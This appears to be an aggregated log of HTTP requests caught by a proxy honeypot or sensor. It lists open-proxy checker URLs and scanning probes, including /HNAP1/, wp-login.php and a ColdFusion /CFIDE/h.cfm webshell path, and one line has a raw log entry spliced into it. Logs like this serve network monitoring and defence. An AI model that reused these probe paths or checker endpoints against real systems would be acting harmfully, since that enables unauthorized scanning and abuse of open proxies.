chekfast.zennolab.com 850 GET http://chekfast.zennolab.com/proxy.php
ipv4scan.com 5 GET http://ipv4scan.com/hello/check.txt
proxy.loresoft.de/ 9 POST http://proxy.loresoft.de/cron/checksum.html HTTP/1.0r
proxyjudge3.proxyfire.net 10 GET http://proxyjudge3.proxyfire.net/fastenv
pubs.acs.org 3 GET http://pubs.acs.org/doi/abs/10.1021/jm900999h?prevSearch=Colistin&searchHistoryKey=
px1.cs.ohio.edu:50070 2 GET /dfshealth.jsp
px1.cs.ohio.edu:50070 1 GET /favicon.ico
spam-chaos.com 11202 GET http://spam-chaos.com/pp/set-cookie.php
test 17 GET /HNAP1/
thepioneer.gatech.edu 2 GET /wp-login.php
vital.cs.ohio.edu 1 GET /wp-content/themes/titan/style.css
vital.cs.ohio.edu 1 GET /wp-includes/js/comment-reply.js?ver=20090102
vital.cs.ohio.edu 1 GET /wp-includes/js/l10n.js?ver=20101110
vital.cs.ohio.edu 1 GET /wp-includes/js/prototype.js?ver=1.6.12014/04/16-09:05:30.355239 132.235.1.54 proxy probe 132.235.4.130 : 80 host: vital.cs.ohio.edu - GET /wp-includes/js/scriptaculous/effects.js?ver=1.8.3
vital.cs.ohio.edu 1 GET /wp-includes/js/scriptaculous/wp-scriptaculous.js?ver=1.8.3
w3-hidden.cc 1 GET http://w3-hidden.cc/checker.php
www.anonymitytest.com 1 GET http://www.anonymitytest.com/cgi-bin/textenv.pl
www.aps.org 1 GET http://www.aps.org/
www.baidu.com 6 GET http://www.baidu.com/
www.baidusystem.com 1 GET http://www.baidusystem.com/proxyheader.php
www.bbcworldwide.com 4 GET http://www.bbcworldwide.com/
www.ebay.com 1 GET /CFIDE/h.cfm
www.google.com 2 CONNECT www.google.com:443
www.google.com 4 GET http://www.google.com/
www.messedupshit.com 5 GET http://www.messedupshit.com/judgeme/azenv.php
www.passmyexams.co.uk 1 GET http://www.passmyexams.co.uk : /GCSE/biology/images/swallowing.jpg
www.sciencedirect.com 9 GET http://www.sciencedirect.com/
www.sina.com.cn 3 GET http://www.sina.com.cn/
www.w3.org 6 GET http://www.w3.org/
www.work.ny-market.ru 9 POST http://www.work.ny-market.ru/proxy5/check.php